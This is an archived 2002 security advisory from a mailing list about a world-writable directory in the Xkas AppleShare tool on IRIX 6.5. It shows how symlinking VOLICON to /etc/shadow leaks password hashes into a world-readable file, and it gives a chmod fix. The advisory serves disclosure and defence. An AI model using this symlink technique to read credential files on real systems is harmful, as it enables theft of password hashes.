[UNIX] Xkas Application Vulnerability
From: support@securiteam.comDate: 02/04/02
- Previous message: support@securiteam.com: "[NEWS] RealPlayer Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Mon, 4 Feb 2002 20:34:26 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Xkas Application Vulnerability
------------------------------------------------------------------------
SUMMARY
<http://dmawww.epfl.ch/ebt-bin/nph-dweb/dynaweb/SGI_EndUser/Xinet_AG/@Generic__BookTextView/28> Xkas is a server administration tool for appleshare. Mis-configuration by the user with the root privilege could lead to serious security vulnerability.
DETAILS
Vulnerable systems:
XKas that comes with IRIX 6.5
HSResource directory and .HSicon file is created when sharing a
directory. Creation of the HSicon file is accomplished by copying the
/var/adm/appletalk/icons/VOLICON file. A problem occurs during this
process because the permission of /var/adm/appletalk/icons directory is
set to 777 (world-writeable). Link the wanted file with VOLICON like the
following.
$ ls -al /var/adm/appletalk/icons
total 8
drwxrwxrwx 4 root sys 57 Jan 25 03:12 .
drwxr-xr-x 6 root sys 4096 Jan 24 16:05 ..
drwxr-xr-x 2 root sys 9 Jan 25 03:12 .HSResource
lrwxr-xr-x 1 loveyou user 11 Jan 25 03:05 VOLICON ->
/etc/shadow
When the administrator uses the /usr/etc/appletalk/xkas directory to share
the root directory, the following files are created in the root.
$ ls -al /
total 17099
drwxr-xr-x 37 root sys 4096 Jan 25 03:30 .
drwxr-xr-x 37 root sys 4096 Jan 25 03:30 ..
drwxr-xr-x 2 root sys 9 Jan 25 03:30 .HSResource
-rw-r--r-- 1 root sys 786 Jan 25 03:30 .HSicon
(etc..)
$ cat /.HSicon
root:y7floveyous30I:10908::::::
bin:yxaiFduxixe8s:11127::::::
uucp:*:11127::::::
sys:*:11127::::::
adm:*:11127::::::
loveyou:mXaa2jxi/ejY:10877::::::
(etc..)
Solution:
Remove 'other-write' permission, contact your vendor, and get a patch.
$ su -
# chmod o-w /var/adm/appletalk/icons
ADDITIONAL INFORMATION
The information has been provided by <mailto:loveyou@hackerslab.org> Kim
Yong-Jun.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] RealPlayer Buffer Overflow"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
